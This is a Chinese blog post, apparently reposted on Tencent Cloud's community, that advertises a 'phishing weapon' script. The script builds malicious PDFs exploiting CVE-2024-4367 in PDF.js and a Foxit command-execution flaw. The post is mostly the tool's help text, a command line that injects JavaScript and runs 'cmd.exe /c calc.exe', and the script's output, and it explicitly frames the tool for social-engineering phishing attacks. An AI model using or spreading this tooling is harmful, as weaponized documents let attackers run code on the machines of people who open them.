前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >社工钓鱼利器:CVE-2024-4367: PDF.js

社工钓鱼利器:CVE-2024-4367: PDF.js

作者头像
Al1ex
发布2024-07-16 15:01:12
2990
发布2024-07-16 15:01:12
举报
文章被收录于专栏:网络安全攻防

项目介绍

集成近期的一些pdf解析器的漏洞,制作PDF文档,用户可以通过改脚本来构造钓鱼文档进行社工钓鱼操作

使用方法

代码语言:javascript
复制
➜  pdf-exploit ./pdf.py --help
usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS]

options:
  -h, --help            show this help message and exit
  -f F                  the harmless pdf path
  -p P                  password
  -o O                  the new pdf file

pdfjs:
  CVE-2024-4367

  -pdfjs PDFJS          javascript to be executed, example: alert(3)

foxit:
  foxit pdf 'flawed design' explotation

  -foxit-exec FOXIT_EXEC
  -foxit-args FOXIT_ARGS

使用示例如下:

代码语言:javascript
复制
➜  pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe"
[+] use the PDF.JS exploit: alert(3)
[+] make a text pdf
[+] make evil font
[+] fd ref: 9
[+] add font object to pdf: 10
[+] set font: /F1

[+] use the foxit exploit: cmd.exe /c calc.exe
set OpenAction to Catalog done

[+] store to /tmp/data.pdf

漏洞集成

目前支持:

  • CVE-2024-4367: PDF.js 解析 pdf 时存在缺陷,可以执行任意的 javascript 脚本。
  • Foxit PDF机制缺陷:windows平台下可以执行远程命令(有弹窗提醒)
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-07-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档